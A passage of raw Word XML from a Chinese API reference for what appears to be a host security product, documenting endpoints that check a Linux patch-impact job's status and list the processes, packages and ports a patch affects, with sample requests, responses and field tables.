            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C0765FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E0CAB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04CCC717" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A6E553D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F0F2EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A3EFF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A39EBB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B139CAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID，如果为null，则创建失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25C8EE96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="查询linux补丁进程影响任务执行状态"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r>
        <w:t>查询linux补丁进程影响任务执行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2875B9C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4764AD22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/patch/linux/business_impact/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52C0C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA5A74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412CC49F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7FCF3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/patch/linux/business_impact/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E624D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E09A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id":""//当前job的jobId, 如果为null, 则当前没有job执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   "status":"running|success|failed"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D511CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018BFEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果id为null，则说明此前从未有过job执行，status为Running。如果id不为null， 则id为最近一次job执行的jobId, status为最近这次job执行的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508747B4"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4618"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6011433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0D69A1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73E303DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6717C0BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154A57A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="349C7D9F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="114D3D06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B2ADC0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1648ECDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B3A3B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID， 如果为null， 则当前没有job执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DDFB2E7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="728C03F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008023D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EEAFF16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2848D9FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>running;success;failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59DF0249" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="查询某个补丁的进程影响"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询某个补丁的进程影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B679777" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A8E1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/patch/linux/business_impact/{patchId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9ADF3A"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954"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7D2FFC9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F72951B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59CEE8FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71CC9330" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50378682" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1942CDCB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34FB3FF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D1EFA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01E2A180" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E5A4CD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32DDAEB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83ED94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/patch/linux/business_impact/QT012014001323?agentId=e9ee72243b0d879c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E3DD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6B99E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agentId": "e9ee72243b0d879c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "patchId": "QT012014001323",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pid": 15669,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "processName": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "startArgs": "/bin/bash -l",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Ver": "5.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Name": "libreadline5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Release": "147.17.30"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ports": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agentId": "e9ee72243b0d879c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "patchId": "QT012014001323",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pid": 15816,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "processName": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "startArgs": "-bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Ver": "3.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Release": "147.17.30"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ports": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agentId": "e9ee72243b0d879c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "patchId": "QT012014001323",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pid": 1392,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "processName": "qpidd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "startArgs": "/usr/sbin/qpidd --data-dir /var/lib/qpidd --daemon",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Ver": "2.12-1.47.el6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Name": "qpidd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Release": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "ports": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "bindIp": "0.0.0.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "port": 5672,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "proto": "tcp"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9BC6CE"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519"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6122"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7D91BF2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6268F98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705FB459" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2296BD62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BEC269B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C183CE6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5F39DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F3BFFD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD2E785" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1508C272" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BF46992" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18E500D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>patchId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="245E4EA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50FB99D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F495951" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D6955DC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A82C429" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55ABFC42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F965FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17CA77F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51B0B5A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0FC0EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4068FC12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169B0C51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553447BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1945D40B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03350CDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startArgs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="253ACA7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B76AEDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="731F77DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
